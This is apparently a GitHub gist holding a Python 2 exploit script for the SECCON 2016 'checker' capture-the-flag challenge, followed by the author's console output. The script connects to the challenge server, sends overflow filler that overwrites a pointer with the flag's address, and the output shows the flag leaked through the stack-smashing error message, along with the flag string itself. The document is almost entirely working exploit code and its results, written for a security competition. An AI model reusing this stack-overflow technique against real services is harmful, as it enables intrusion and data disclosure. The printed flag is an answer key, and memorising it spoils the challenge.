@otms61
Created December 10, 2016 17:27
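#!/usr/bin/python
# -*- coding: utf-8 -*-
# Python 2 script (relies on socket.makefile(bufsize=0) and telnetlib).
import socket
import struct
import telnetlib


def sock(remoteip, remoteport):
    # Open a TCP connection; return the socket and an unbuffered file wrapper.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


def p(a):
    # Pack an integer as a little-endian 64-bit value.
    return struct.pack("<Q", a)


def shell(s):
    # Hand the socket to telnetlib so remote output is relayed to the terminal.
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


flag_addr = 0x6010c0  # address sent after the filler in the last long line
offset = 376          # number of filler bytes sent before that address

# s, f = sock('localhost', 4444)
s, f = sock('checker.pwn.seccon.jp', 14726)
# Answer to the NAME prompt.
f.write('a'*0x7f + '\n')
# Lines of offset + i filler bytes, with i counting down from 8 to 1.
for i in range(8, 0, -1):
    f.write('a'*offset + 'a'*i + '\n')
# Filler followed by the packed flag_addr.
f.write('a'*offset + p(flag_addr) + '\n')
# Answer 'yes' to "Do you know flag?".
f.write('yes' + '\n')
# Input for the FLAG prompt.
f.write('a' + '\n')
shell(s)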

otms61 commented Dec 10, 2016

$ python checker.py
Hello! What is your name?
NAME :
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Do you know flag?
>>
Oh, Really??
Please tell me the flag!
FLAG : You are a liar...
*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
*** Connection closed by remote host ***
